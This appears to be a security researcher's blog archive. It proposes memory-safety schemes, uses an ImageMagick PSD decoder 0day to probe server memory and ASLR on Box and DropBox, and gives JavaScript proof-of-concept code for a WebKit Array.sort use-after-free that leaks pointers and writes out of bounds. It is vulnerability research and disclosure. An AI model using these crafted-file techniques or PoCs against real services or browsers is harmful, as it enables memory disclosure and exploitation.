  • This scheme will crash horribly if a stack, BSS or other non-heap pointer value is passed to memcpy(). A generic method of mapping arbitrary pointers to memory metadata needs to be extended to all pointers -- or the checks need to only fire for heap locations.
  • This scheme won't protect against intra-chunk overflows, e.g. if the memcpy() destination is a buffer within a heap allocated struct, and the struct contains sensitive data after the buffer. Perhaps a candidate here for compiler struct re-ordering?
But back to awesomeness, note that memcpy() is just a simple loop that iterates memory so you can imagine adding compiler support to decorate more complicated loops with high performance bounds checks.

Scheme #2: Pointer invalidation with pointer arithmetic checking

We can make the observation that a lot of existing memory checker tools perform checks on every pointer dereference (e.g. ASAN). However, the time when a pointer goes from "good" to "bad" is often when pointer arithmetic is applied to a pointer, such as bumping a pointer along at the end of a loop. 

Given that pointer arithmetic is a little less common than pointer dereference, would it be higher performance to instead do checks when a pointer is incremented, to see if it crosses a chunk boundary? As a bonus, this would provide stronger guarantees than the ASAN model because in the ASAN world, e.g. *(ptr + 70) might not fault if that jumps over a redzone.

Scheme #3: Use-after-free detection with pointer cookies

Somewhat specific to 64-bit, but let's take x86-64 and presume that we reserve the upper 16 bits of every pointer value to stamp in a cookie. Then:
  • At malloc() time, a random 16 bit cookie is assigned to the heap chunk and stored as metadata associated with the chunk.
  • The returned pointer has the cookie value as the upper 16 bits.
  • Copying a pointer around, or doing pointer arithmetic, proceeds at full speed and preserves the upper 16 bits.
  • Dereferencing a pointer requires masking off the upper 16 bits and comparing them to the cookie value associated with the referenced heap chunk.
  • As an optimization, the cookie value only needs to be re-checked if free() has been called, or a function is called that might call free(). So tight loops proceed with only the one check up front.
  • When a heap chunk is freed, the cookie value is cleared. The cookie values for existing pointers into the chunk will not match while the chunk is free, and also will not match if the chunk is reallocated.
Scheme #n: Your scheme here

I'm sure there are cleverer people than me out there who can propose better schemes. My point is that we need to try, because there are a ton of little tricks we can pull in this space to make some defenses that are both meaningful and fast.


I really think we can stop memory corruption at the source for some vulnerability classes. There's going to be a performance hit but we can claw some of it back by retiring existing mitigations as they become less relevant.

And is there any reason not to burn a couple years of Moore's law to kill off some memory corruption classes, instead of repeatedly trying to patch up their symptoms?

Thursday, May 11, 2017

[0day] Proving fixed ASLR via ImageMagick uninitialized zlib stream buffer


In my previous post, we explored using an ImageMagick 0day (now a 1day) in the RLE decoder to determine missing ASLR in both Box and DropBox. In response, both Box and DropBox sensibly limited the available decoders. Both dropped RLE support and lots more.

As you may recall from a different but related post, I had challenges working with Box to accurately determine the status of security reports I submitted. In fact, I have neither a confirmation nor denial of the missing ASLR issue on ImageMagick. I've already proven the missing ASLR to my satisfaction in the previous posts -- but is it fixed?

This is a fairly ridiculous length to go to, but: let's prove that Box did fix the ASLR issue, by using another ImageMagick 0day!


Here's a zoomed-in sample image returned in response to thumbnailing a greyscale 8x16 variant of an image file that we'll explore below. We're seeing raw memory bytes from a free chunk:

The vulnerability

So when Box went on an ImageMagick decoder removal spree, they obviously had to leave intact the decoders for a few popular formats: JPEG, PNG, etc. One less common decoder left intact was PSD: Adobe Photoshop. This is an understandable product decision. But it's also more attack surface for us to examine. The 0day vulnerability is in the PSD decoder (coders/psd.c):

  compact_pixels=(unsigned char *) AcquireQuantumMemory(compact_size,
    sizeof(*compact_pixels));
  ...
  /* Return value unchecked: a short read leaves compact_pixels
     partially (or fully) uninitialized. */
  (void) ReadBlob(image,compact_size,compact_pixels);
  ...
  stream.next_in=(Bytef *)compact_pixels;
  stream.avail_in=(uInt) compact_size;
  stream.next_out=(Bytef *)pixels;
  stream.avail_out=(uInt) count;

  if (inflateInit(&stream) == Z_OK)
    {
      while (stream.avail_out > 0)
        {
          ret=inflate(&stream,Z_SYNC_FLUSH);
          if ((ret != Z_OK) && (ret != Z_STREAM_END))
            break;
        }
      ...
    }
The above code snippet is reading in a PSD image color channel from the input file, where it is compressed using ZIP compression. The compact_size variable comes nearly directly from the input file, and it represents the size in bytes of the compressed zip stream. This size is used to allocate a malloc()'ed buffer to hold the compressed data, and the buffer is filled with a read from the input stream. The vulnerability is that there is no return value checking for the ReadBlob() call. This means that if the input file hits an end-of-file condition during the read, the compact_pixels buffer will remain partially or even fully uninitialized.

You can refer to this vulnerability as CESA-2017-0003. It really is an 0day: unreported or unfixed upstream, let alone in Linux distributions or on cloud providers.

The exploit

The previous ImageMagick bugs I've been exploiting have been relatively simple to exploit because raw bytes of memory end up directly in the decoded canvas. With this vulnerability, however, the raw bytes of memory are in a buffer which is to be decoded as a zlib stream. Obviously, many possible sequences of bytes will not be valid zlib streams. And sequences of bytes that are valid zlib streams will likely result in output that is hard (or impossible) to reverse back to the original raw memory bytes. Finally, note that zlib streams are checksummed, and quasi-random bytes in memory are unlikely to have a correct trailing checksum.

Fortunately, a little trick presents us with a neat solution. It's useful to have a basic understanding of the zlib format, RFC1950, and the contained deflate stream format, RFC1951. The core of the trick is noting that the deflate stream format is composed of blocks, with the block types being:

BTYPE specifies how the data are compressed, as follows:

            00 - no compression
            01 - compressed with fixed Huffman codes
            10 - compressed with dynamic Huffman codes
            11 - reserved (error)

We really don't want to get into reversing the output of Huffman decoding, but "no compression" sounds very intriguing. What if we used a preamble of a zlib header followed by an uncompressed deflate block -- leading in to the bytes of uninitialized memory? We can achieve this by abruptly ending our PSD input file with this 7 byte sequence:

78 9c: standard zlib header and options
01   : deflate block header: BFINAL=1 (final block), BTYPE=00 (no compression)
ff ff: length 65535
00 00: length "checksum", which is the negation of the length

Let's say we have an input file which claims a compressed length of 16. The 16 byte compressed data buffer is allocated but filling it results in a short read of 7 bytes (which goes unnoticed and unchecked) with the remaining 9 bytes remaining uninitialized:

compact_pixels: | 78 9c 01 ff ff 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? |

Treating this as the first 16 bytes of a zlib stream will decode to whatever is in those 9 bytes of uninitialized memory. We're back to exfiltrating raw bytes again, which is a win. (Note that the start of the output is at byte 7 into the heap chunk, which is not nicely 8 byte aligned. This explains why the pointers in the dump below appear to be offset by 1 byte.)

There's one more quirk, though. This still isn't a valid zlib stream, because it is truncated, both in terms of missing data and a missing final checksum. How will the ImageMagick PSD decoder handle this? The answer lies in looking at the exit condition for the zlib inflate loop. We see that it only cares that the output buffer was filled. It specifically does not care whether the zlib API ever declares that the decode ended. So again taking the hypothetical 16 byte compressed data buffer, the PSD code will stuff 16 bytes as input into the zlib input buffer. Let's further assume that the output channel is a 2x2 canvas, requiring 4 bytes to fill. This buffer and length is also passed to zlib as the output buffer and length. When zlib is called for the first time, it will have 9 bytes of actual output available, but emit only 4 of them because that's the size of the output buffer. And that's it. The PSD code will exit the zlib decode loop and continue. (In case you are curious, a more typical zlib loop would consume the full zlib output buffer, then call into zlib again with a new output buffer to fill. It would also perhaps similarly check to see if the input buffer was fully drained.)

Here's the sample PSD exploit file: zip_uninit_read_128.psd.

I won't break this one down byte by byte because it's 133 bytes of file format glue to get to the ZIP attack surface.


Let's upload the PSD file to Box and then view the preview pane for the uploaded file and save the displayed PNG file. It results in an image like the one above. Extracting raw bytes is just a matter of an ImageMagick conversion command, although the Ubuntu 16.04 LTS ImageMagick appears to be buggy for certain greyscale images, so we'll use GraphicsMagick:

gm convert box_zip_uninit_128.png out.gray
od -t x1 out.gray

0000000 00 f8 81 bd 7b 18 7f 00 00 70 00 00 00 00 00 00
0000020 00 71 00 00 00 00 00 00 00 00 d1 d0 7d 18 7f 00 
0000040 00 78 81 bd 7b 18 7f 00 00 80 94 d0 7d 18 7f 00 
0000060 00 d0 ce d0 7d 18 7f 00 00 20 00 00 00 00 00 00
0000100 00 50 00 00 00 00 00 00 00 80 d1 d0 7d 18 7f 00 
0000120 00 31 00 00 00 00 00 00 00 78 81 bd 7b 18 7f 00 
0000140 00 80 cf d0 7d 18 7f 00 00 30 58 d1 7d 18 7f 00 
0000160 00 78 81 bd 7b 18 7f 00 00 90 00 00 00 00 00 00

In the above hex dump, the pointers are the little-endian qwords ending in the telltale 7f 00 00 byte pattern. All ten are wholesome pointers indicating good ASLR. You can contrast this with some pointers in my previous post which clearly indicated that Box did not have ASLR on their binary.

Proving a result with a negative (the lack of a clearly dubious pointer) is not particularly scientific, but I'll note that I tried a variety of different upload image sizes in order to explore the content of recently freed heap chunks of a variety of different sizes. I also tried the upload of some files multiple different times and never saw a pointer indicating a lack of binary ASLR. When binary ASLR was indeed absent, the same tests readily indicated the fact.


The overall weight of evidence, split across two blog posts, suggests that Box did not previously have binary ASLR enabled, and they did indeed make a change and fix the issue after my report. We used an ImageMagick 0day (now 1day) to prove that ASLR was missing, and then a different ImageMagick 0day (still 0day today :) to prove that ASLR is now present. The loop is now satisfactorily closed.

Wednesday, May 10, 2017

Proving missing ASLR on Box and DropBox over the web for a $343 bounty :D


Cloud file storage providers such as Box and DropBox will typically thumbnail uploaded images for purposes of showing icons and previews. Predictably, both providers appear to use ImageMagick for thumbnailing. So what happens if we come knocking with the ImageMagick 1-day CESA-2017-0002?

CESA-2017-0002 is a vulnerability in the RLE image decoder, where the allocated render canvas memory is not initialized under some conditions. This leads to the server generated thumbnail and preview being based on uninitialized memory. The pixels of the resulting preview can be used to reconstruct chunks of server memory.

The vulnerability itself is not particularly complicated, and will be fully described in a future post that describes a scenario where it has more bite.

Sandboxing and isolation

This vulnerability has interesting interactions with sandboxes and process boundaries. While sandboxes can do wonders to mitigate vulnerabilities such as remote code execution and filesystem leaks, they do little for bugs that leak memory content, such as this one.

On the other hand, good use of process boundaries can help against bugs that leak memory content. In a one-process-per-thumbnail model, the virtual address space of the process is only going to contain the attacker's data, and likely not the private data of anyone else.

In the case of Box and DropBox, I've not seen any indications of leaking anyone else's private data. It's likely that they are both using a one-process-per-thumbnail model. Certainly, one "easy" way to integrate ImageMagick would be to use the convert binary to run individual image transform jobs. This would give a one-process-per-thumbnail model.

Trying to get a bounty

Let's face it, getting a bug bounty is kind of cool. Given that we don't think we can leak someone else's data, might there be anything else in the address space that we could leak that is worthy of a bounty? Unfortunately, most bounty programs exclude minor leaks such as precise versioning information or configuration details.

But one idea does occur to us: since we're leaking the content of free'd memory chunks, we're very likely to see pointer values for things like malloc() freelist entries. The specific values of these pointers will tell us what level of ASLR exists in the process. If the level of ASLR is anything other than "full ASLR", would that be worth a bounty? Maybe. Let's proceed to try and leak some pointer values.

Exfiltrating bytes of memory

To exfiltrate bytes of memory, we will upload a color RLE file of 16x8 dimensions and download the resulting PNG file from the file preview panel. For both Box and DropBox, the preview has the following useful traits:
  • Produces a PNG download. PNG is a lossless format, so the PNG pixel values should correspond exactly with raw memory bytes.
  • Leaves image dimensions alone for smaller image sizes. This is useful because any downscaling would result in information loss.
We choose a 16x8 file based on trial and error. The size of the input file determines what malloc() size is used for the canvas that is not initialized properly:

    /* The canvas allocation, sized from dimensions in the input file;
       under some conditions it is never subsequently initialized. */
    pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);

Different sizes here will result in the leak of different portions of the heap. 16x8 leads to a 512 byte allocation. Based purely upon testing rather than theory, this appears to be a good size that reliably leaks pointer values. But if we make the size too large, perhaps in the greedy hope of leaking tons of data, we'll end up with our allocation getting placed at the end of the heap. Obviously, there won't be any previous content in a brand new allocation at the end of the heap, and we'd leak a bunch of 0 bytes, which is not particularly impressive.

Observed leaked bytes were fairly consistent across runs, lending further evidence that Box and DropBox might just be using the convert binary, which would have a fresh heap state on each operation. This also suggests that if we really wanted to, we could carefully control the allocations and deallocations that our input file performs, in order to get the heap into a specific state to control exactly what was leaked.

Here are two examples of leaked images:

On the left is Box and on the right DropBox. The images have been scaled to 800% original size for clarity. Right away, we can visually see that our empty input canvas has resulted in a non-empty output canvas: leaked memory content! In order to turn the original downloaded PNG into a more digestible format, we can convert it to raw bytes like this:

convert box_16_8_rgb_rle.png out.rgb

Dumping the resulting out.rgb file (e.g. with od -t x1), we can look for pointers. First, Box:

0000000 88 27 81 cf cd 7f 00 00 88 27 81 cf cd 7f 00 00
0000020 00 39 18 02 00 00 00 00 00 39 18 02 00 00 00 00
0000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000140 00 00 00 00 00 00 00 00 20 31 81 cf cd 7f 00 00
0000160 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
0000200 00 00 00 00 00 00 00 00 f0 39 18 02 00 00 00 00

Byte sequences such as 88 27 81 cf cd 7f 00 00 appear to be pointers to "high" locations in x86_64 virtual memory: read little-endian, that first one is 0x00007fcdcf812788. In fact, that's probably a pointer into the glibc static BSS, for the head of one of the freelist buckets. Running the test again, we get the different value 0x00007efdaac7d788, but the lower 12 bits (i.e. page offset) are the same, at 0x788.

Other sequences, such as f0 39 18 02 00 00 00 00, appear to be pointers to "low" locations in virtual memory: 0x00000000021839f0. Running the test again, we get 0x0000000001cc19f0.

For DropBox, we dump out the following values of interest, with the same kinds of high and low pointer values present, and similar results:

0000000 30 76 38 02 00 00 00 00 00 00 00 00 00 00 00 00
0000020 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
0000040 00 00 00 00 00 00 00 00 00 07 2c c9 5a 7f 00 00
0000060 00 00 00 00 00 00 00 00 54 52 53 54 ff ff ff ff
0000100 70 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00
0000120 70 75 38 02 00 00 00 00 00 00 00 00 00 00 00 00
0000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000220 00 00 00 00 00 00 00 00 61 02 00 00 00 00 00 00
0000240 d0 66 38 02 00 00 00 00 c0 75 38 02 00 00 00 00

ASLR determination

So, can we conclude what ASLR situation exists in the processes we dumped data from? Yes. At first glance, the ASLR may appear reasonable because all of the pointers are bouncing around between invocations. But there are at least 4 possible Linux ASLR setups that we should try and distinguish between. Here are some examples of these four setups for Linux x86_64:

1) Position independent executable, no system ASLR (/proc/sys/kernel/randomize_va_space)

555555554000-555555580000 r-xp 00000000 fc:01 659830                     /usr/bin/curl
55555577f000-555555782000 r--p 0002b000 fc:01 659830                     /usr/bin/curl
555555782000-555555783000 rw-p 0002e000 fc:01 659830                     /usr/bin/curl
555555783000-555556f4b000 rw-p 00000000 00:00 0                          [heap]

2) Position independent executable, and system ASLR

55809480d000-558094839000 r-xp 00000000 fc:01 659830                     /usr/bin/curl
558094a38000-558094a3b000 r--p 0002b000 fc:01 659830                     /usr/bin/curl
558094a3b000-558094a3c000 rw-p 0002e000 fc:01 659830                     /usr/bin/curl
558095533000-558096cfb000 rw-p 00000000 00:00 0                          [heap]

3) Statically positioned executable, no system ASLR

00400000-00401000 r-xp 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00600000-00601000 r--p 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00601000-00602000 rw-p 00001000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00602000-00692000 rw-p 00000000 00:00 0                                  [heap]

4) Statically positioned executable, and system ASLR

00400000-00401000 r-xp 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00600000-00601000 r--p 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00601000-00602000 rw-p 00001000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
0242d000-024bd000 rw-p 00000000 00:00 0                                  [heap]

In both the Box and DropBox cases, the pointers we have leaked match case 4), statically positioned executable with system ASLR. We make this determination because the supposed heap pointers are low but slightly variable between runs.

Ergo, both Box and DropBox have a vulnerability: missing ASLR on the binary used to do the thumbnailing. Put another way, that binary was not compiled as position independent. It's not a particularly surprising vulnerability: my Ubuntu 16.04 install has the same problem:

file -L /usr/bin/convert
/usr/bin/convert: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)

Box vs. DropBox

When the same vulnerability crops up in two different places, the opportunity arises to perform comparisons. Both Box and DropBox appeared to have a one-process-per-conversion model and both responded to the report promptly by performing the most important action, which was to firmly curtail the number of ImageMagick decoders on the attack surface. Further to my previous post about a likely ancient ImageMagick on Box, no evidence of ancient ImageMagick was found on DropBox.


Determining whether ASLR is correctly enabled or not on the server is usually opaque to web application security testing. But by finding a vector to leak the content of server memory, we can match up pointer values to the status of ASLR on the server.

For my trouble, DropBox awarded me a $343 bounty. Box does not have a bounty program at this time.

Lack of ASLR on the ImageMagick conversion process could be a useful foot in the door to a memory corruption attack. One-shot exploitation of image decoding is fairly hard, because you have to defeat ASLR and also land the corruption exploit within the context of a single image decode, where you typically don't have scripting available. If, however, the binary is at a fixed location due to missing ASLR, exploitation is a much more tractable problem.

Friday, May 5, 2017

Ode to the use-after-free: one vulnerable function, a thousand possibilities


This post explores an old but wonderful vulnerability that enables us to really showcase the (oft underestimated) power of the use-after-free vulnerability class.

We’re going to take a step back and consider the wider class of “use-after-invalidation”, of which use-after-free is one type of use of invalidated state. We will see one single area of vulnerable code that has it all: use-after-invalidation leading to out of bounds reads and writes; use-after-free leading to object aliasing; use-after-free leading to information leakage and more. It’s hard to imagine a better real vulnerability exists for the study of this area.

We’ll dive into all the different side effects a use-after-free can have, and -- of course!! -- get to the stage of working and highly reliable exploits.

Introducing CVE-2012-3748

CVE-2012-3748 has a very storied history. It originally acquired public fame when used in Mobile Pwn2Own to pwn an iPhone 4S (Sep 2012), getting assigned ZDI-13-009. The eventual Apple advisory is here (Feb 2013).

A public exploit may be found here on Packet Storm (Sep 2013). It’s worth noting that the author is Vitaliy Toropov, a hacker who later found infamy when he was outed as a supplier to Hacking Team. (The Hacking Team Flash bug was similar: memory corruption resulting from unexpected state changes in a script callback.)

And as one commentator notes on a thread discussing a port of this vulnerability to the PlayStation 4, “That one WebKit bug is the gift that keeps on giving” (Oct 2014).

In general, everyone ships an out of date WebKit and Linux distributions are no different. So it wasn’t really a surprise to me to look at an old but still supported Linux distribution, Ubuntu 12.04 LTS, and find the same vulnerability present. To explore this vulnerability, I’m using 32-bit and 64-bit versions of fully patched Ubuntu 12.04 LTS, and the WebKit backend for the Konqueror browser.
[Note: since starting to write this post, Ubuntu 12.04 LTS has passed end of life.]
For what it’s worth, the woeful state of WebKit packaging on Linux was discussed in Feb 2016 in this blog post, which was picked up by Linux Weekly News.

The vulnerability

The vulnerability is a range of issues leading to memory corruption in the C++ code backing the Array.sort() JavaScript API. The manifestation of the vulnerability changed over its lifetime as various code changes and optimizations were made. The 2013 exploit is based on this version of the JSArray.cpp C++ file:

We won’t dwell on this one for long because this behaves differently to our Ubuntu version. But briefly:

void JSArray::sort(ExecState* exec, JSValue compareFunction, CallType callType, const CallData& callData)
{
    ...
[1]    unsigned usedVectorLength = min(m_storage->m_length, m_vectorLength);
    ...
[2]    for (; numDefined < usedVectorLength; ++numDefined) {
           JSValue v = m_storage->m_vector[numDefined].get();
           if (!v || v.isUndefined())
               break;
           tree.abstractor().m_nodes[numDefined].value = v;
[3]        tree.insert(numDefined);
       }
    ...
       for (unsigned i = 0; i < numDefined; ++i) {
[4]        m_storage->m_vector[i].set(globalData, this,
    ...

For the purposes of discussion, let's assume that we have a JavaScript Array of length 2, containing the values 0, 0. At [1] above, the used Array size is 2. At [2], the loop will iterate twice, locating the two defined values and eventually leaving the loop with numDefined set to 2. [3] is where the problems occur: inserting into the sort tree causes a callback into JavaScript, and this callback can mess with the Array that we're currently sorting. If our callback specifically calls Array.shift(), we'll get some fireworks. Shifting the Array essentially removes the first element; internally this is accomplished by bumping the m_storage pointer along one element (8 bytes) and reducing the size by one. At [4], the code still believes the Array has length 2, so it will iterate twice and write two sorted values. However, the write will start at an m_storage pointer that was bumped along by one element. This is an out-of-bounds write, a.k.a. a buffer overflow!

You might wonder if it's possible to just make the array smaller via more conventional means such as Array.pop(), and achieve similar results. As it happens, the code is very reluctant to reallocate the backing store to a smaller size, so the Array.shift() exploitation path is the only obvious one.

Anyway, we are targeting the vulnerability as it exists in Konqueror in our Ubuntu install. Konqueror is the KDE web browser and its WebKit backend uses QtWebKit, specifically version 2.2.1, which appears to be close to JSArray.cpp@r88503. Let’s have a look at that:

void JSArray::sort(ExecState* exec, JSValue compareFunction, CallType callType, const CallData& callData)
[1]    ArrayStorage* storage = m_storage;
      unsigned usedVectorLength = min(storage->m_length, m_vectorLength);
      unsigned nodeCount = usedVectorLength + (storage->m_sparseValueMap ?
                                               storage->m_sparseValueMap->size() : 0);
[2]    tree.abstractor().m_nodes.grow(nodeCount);
      unsigned numDefined = 0;
      unsigned numUndefined = 0;
      for (; numDefined < usedVectorLength; ++numDefined) {
[3]        JSValue v = storage->m_vector[numDefined].get();
          if (!v || v.isUndefined())
              break;
          tree.abstractor().m_nodes[numDefined].value = v;
[4]        tree.insert(numDefined);
      unsigned newUsedVectorLength = numDefined + numUndefined;

[5]    if (SparseArrayValueMap* map = storage->m_sparseValueMap) {
          newUsedVectorLength += map->size();
          if (newUsedVectorLength > m_vectorLength) {
              // Check that it is possible to allocate an array large
              // enough to hold all the entries.
              if ((newUsedVectorLength > MAX_STORAGE_VECTOR_LENGTH) ||
                  !increaseVectorLength(newUsedVectorLength)) {
[6]        storage = m_storage;

[7]        SparseArrayValueMap::iterator end = map->end();
          for (SparseArrayValueMap::iterator it = map->begin(); it != end; ++it) {
[8]            tree.abstractor().m_nodes[numDefined].value = it->second.get();
[9]            tree.insert(numDefined);

[10]       delete map;
[11]       storage->m_sparseValueMap = 0;
      for (unsigned i = 0; i < numDefined; ++i) {
[12]       storage->m_vector[i].set(globalData, this,
[13]   storage->m_numValuesInVector = newUsedVectorLength;

There’s a lot going on here, but in an attempt to make sense of the possibilities, there is a color code:
  • Yellow for places where the code caches some value or decision that could be invalidated in a JavaScript callback.
  • Orange for places where a JavaScript callback can occur.
  • Red for places where the results of invalidated values or decisions can cause corruptions.

Most of the problems occur because the storage pointer is cached as a stack local variable at [1], but the memory allocation for the actual Array storage can get moved during the JavaScript sort callback at [4] and [9], if for example the Array is shifted or expanded. Direct fallout is at [3], [5], [11], [12], [13] with a significant secondary fallout at [10] that we’ll cover later.

Another problem occurs because the length of the sort node allocation at [2] can become invalid, with buffer overflow resulting at [8] if the attacker does things in the right order. This is an interesting use-after-invalidation leading to out-of-bounds write. This post will concentrate on the use-after-free opportunities but still, it’s interesting to see a single vulnerable area lead to such a wide range of side effects and different vulnerability classes.

The final problem of note occurs because the end iterator of a map is taken at [7] but the map itself could be changed (have keys added or removed) in the callback at [9], which may invalidate any existing iterators.

Invalidation options and allocator considerations

To continue exploring the effects of these vulnerabilities, and how they might lead to exploitation, we need to understand our exact invalidation options and also how the allocator affects matters.

By invalidation options, we’re talking about what exactly to do inside the JavaScript callback to change the state of the Array mid-sort. Here is what we can do:

  • Add more elements to the dense end of a dense Array. A dense Array is one which has high density of elements, which includes any Array where all of the elements are set in sequence from index 0. By adding more elements to the end of a dense Array, it will need to expand its internal storage, which results in a reallocation. This reallocation can invalidate the storage pointer in the code above.
  • Remove elements from the end of a dense Array. You might assume that shrinking a dense array would also cause a reallocation, down to a smaller size. Strangely, I was not able to see a code path that achieves this. This implies that either I missed something, or that the code is wasteful when an Array grows large and is then shrunk back down. At any rate, this avenue is not explored.
  • Add more sparse elements to an Array. An Array stores sparse elements when it believes the Array is not dense, or when a wildly high Array index is used. Adding sparse elements to an Array can cause the reallocation of the HashMap buffer that maps sparse keys to element values.
  • Shift or unshift an Array. Shifting or unshifting an Array is where new elements are chopped off or added to the front of the Array. The implementation of this is interesting. Because the underlying data structure is an array, as opposed to a linked list or double ended queue, adding or removing elements from the front involves copying all the existing elements around. Or does it? There’s actually a little optimization trick used where the C++ header object is copied around instead of the elements! This is shown pictorially and explored below.
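For concreteness, here is roughly what each invalidation option looks like as plain JavaScript (illustrative stand-ins of my own; in the attack, each of these would run inside the sort callback, where the timing is what matters):

```javascript
// Each helper performs one of the invalidation options described above.
var a = [1, 2, 3, 4, 5];
var lengths = [];

function shiftFront()   { a.shift(); }            // header-copy trick internally
function unshiftFront() { a.unshift(0); }
function growDense()    { for (var i = 0; i < 1000; ++i) a[a.length] = i; }
function addSparse()    { a[0x80000000] = 1; }    // wildly high index -> sparse map

shiftFront();   lengths.push(a.length);  // 4
unshiftFront(); lengths.push(a.length);  // 5
growDense();    lengths.push(a.length);  // 1005: dense storage reallocated
addSparse();    lengths.push(a.length);  // 2147483649: sparse element added
```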

The allocator used has a bearing on how the various invalidations above behave. Looking in JSArray.cpp, we see the Array storage is allocated like this (example from one of the constructors):

   m_storage = static_cast<ArrayStorage*>(fastMalloc(storageSize(initialCapacity)));

fastMalloc is in fact WTF::fastMalloc() which is itself based on a built-in copy of the tcmalloc allocator. tcmalloc is a strictly bucketing allocator for smaller sizes, with last-in, first-out semantics for a given bucket size. The consequences of this include:

  • The use of fastMalloc() is explicit in the code base. Any allocations not explicitly using this API will use the system allocator. So when we are targeting objects types for buffer overflow or use-after-free overlap, we’ll need to stick to object types that are explicitly using fastMalloc().
  • If we want to exploit a use-after-free, we have good reliable opportunities. If the freed object is e.g. 128 bytes in size, then the next 128 byte allocation will be placed in the freed slot.
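To illustrate the last-in, first-out behavior we rely on, here is a toy model of a strictly bucketing allocator (a deliberate simplification of my own, not tcmalloc's actual code):

```javascript
// Toy bucketing allocator: one LIFO free list per (8-byte rounded) size class.
var nextAddr = 0x1000;
var freeLists = {};

function sizeClass(size) { return Math.ceil(size / 8) * 8; }

function alloc(size) {
  var cls = sizeClass(size);
  var list = freeLists[cls];
  if (list && list.length)
    return list.pop();  // the most recently freed chunk is handed out first
  var addr = nextAddr;
  nextAddr += cls;
  return addr;
}

function free(addr, size) {
  var cls = sizeClass(size);
  (freeLists[cls] = freeLists[cls] || []).push(addr);
}

// A freed 56 byte chunk is handed straight back to the next 56 byte request.
var victim = alloc(56);
free(victim, 56);
var attacker = alloc(56);
console.log(victim === attacker);  // true: deterministic reuse
```

This determinism is exactly why the use-after-free situations below are so reliable: the attacker chooses what lands in the hole simply by making the next same-sized allocation.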

Let’s look at some specific JavaScript proof of concept code for some of the problems:

Situation #1: invalidated size leading to out-of-bounds write

This is an interesting situation, but not one we’ll use for any of our exploits, so let’s get it out of the way:

var myCompFunc = function(x, y) {
  if (!sort_iters) {
    sort_iters++;
    alert("sorting: " + x + " and " + y);
    for (i = 0; i < 256; ++i) {
      a1[0x80000000 + i] = i;
    }
  }
  return 0;
}

sort_iters = 0;
a1 = [1, 2];
a1.sort(myCompFunc);

This code starts with a dense Array, a1, of length 2. This will result in a Vector buffer allocation of size 2 at point [2] in the C++ code. As the element values 1 and 2 are compared in the first sort iteration, the JavaScript callback adds lots of elements to the Array that will go into the sparse map because the indexes are very large. Later, at point [8] in the C++ code, the sparse map will be iterated and all of the elements will be added to the Vector buffer allocated earlier. But, the sparse map contains 256 elements and the Vector buffer is only 2 elements large. The Vector buffer contains some slop space due to a default minimum capacity of 16, but 256 elements is enough to fill the slop space and smash some adjacent allocation. On 64-bit, the eventual crash looks like:

#0  WebCore::RenderBoxModelObject::paintBoxShadow()
cmp 0x18(%rbx),%ebp
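As a quick sanity check of the sizes involved, using the numbers quoted in the text above:

```javascript
// Back-of-envelope: 256 sparse entries written into a node vector that was
// only grown to the 16 element minimum capacity.
var minCapacity = 16;    // default minimum, per the text
var written = 256;       // sparse entries inserted by the callback
var elemSize = 8;        // each node slot holds an 8 byte JSValue
var overflowBytes = (written - minCapacity) * elemSize;
console.log(overflowBytes);  // 1920 bytes smashed past the allocation
```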

Since this is a linear buffer overflow, heap spraying would be needed to place an interesting chunk in the area of corruption. Heap spraying is usually probabilistic instead of deterministic, so is disfavored for highly reliable exploits. We’ll see below how use-after-invalidation vulnerabilities can offer significantly greater reliability.

Situation #2: invalidated shifted read pointer leading to information leak

var myCompFunc = function(x, y) {
  if (x) {
    dv.setFloat64(0, x, true);
    alert('leaked: 0x' + dv.getUint32(0, true).toString(16));
  }
  if (y) {
    dv.setFloat64(0, y, true);
    alert('leaked: 0x' + dv.getUint32(0, true).toString(16));
  }
  if (!sort_iters) {
    sort_iters++;
    a1.splice(0, 4);
  }
  return 0;
}

dv = new DataView(new ArrayBuffer(8));
sort_iters = 0;
a1 = [0, 0, 0, 0, 0];
a1.sort(myCompFunc);

If you run this in 32-bit Konqueror, it’ll output something like: “leaked: 0xad9955c0”. If you run it in 64-bit Konqueror, it will crash. We’ll get to that later as it complicates our 64-bit exploit. To focus on why this works on 32-bit, let’s use a diagram:

In the above diagram, we see how the exact same single fastMalloc() chunk looks before and after the Array.splice() operation. The same allocation contains both a C++ object header (24 bytes on 32-bit) and the variable-length Array elements, which are 8 bytes each in order to accommodate a double floating point value if necessary. The C++ object header, a JSC::ArrayStorage, is colored yellow. Element storage is colored green. The object member labelled ptr is actually JSC::ArrayStorage::m_allocBase, a pointer to the beginning of the fastMalloc() chunk, and it is this useful value that we leak.

The leak occurs because the chunk of memory to iterate for the sort, shown in orange above, is fixed at the beginning of the sort. However, the splice operation is called in the middle of the sort, in the JavaScript sort callback, when elements 0 and 1 are being compared. The splice shifts the C++ object header along into the predetermined (and now invalid!) iteration range. When elements 2, 3 are read, the reads actually read the values of the JSC::ArrayStorage object. These values will be treated as doubles but luckily the DataView JavaScript class can convert a double into raw bytes for extraction of the pointer.
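For readers unfamiliar with the DataView trick, here is the double-to-raw-bytes conversion in isolation; it runs anywhere, no vulnerable engine required:

```javascript
// Reinterpret a JavaScript double as raw little-endian bytes.
var dv = new DataView(new ArrayBuffer(8));
dv.setFloat64(0, 1.5, true);        // 1.5 has IEEE-754 bits 0x3ff8000000000000
var lo = dv.getUint32(0, true);
var hi = dv.getUint32(4, true);
console.log('0x' + hi.toString(16) + ', 0x' + lo.toString(16));  // 0x3ff80000, 0x0
```

In the leak, the "double" being converted is really a pointer-sized header field that was read out of bounds by the sort.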

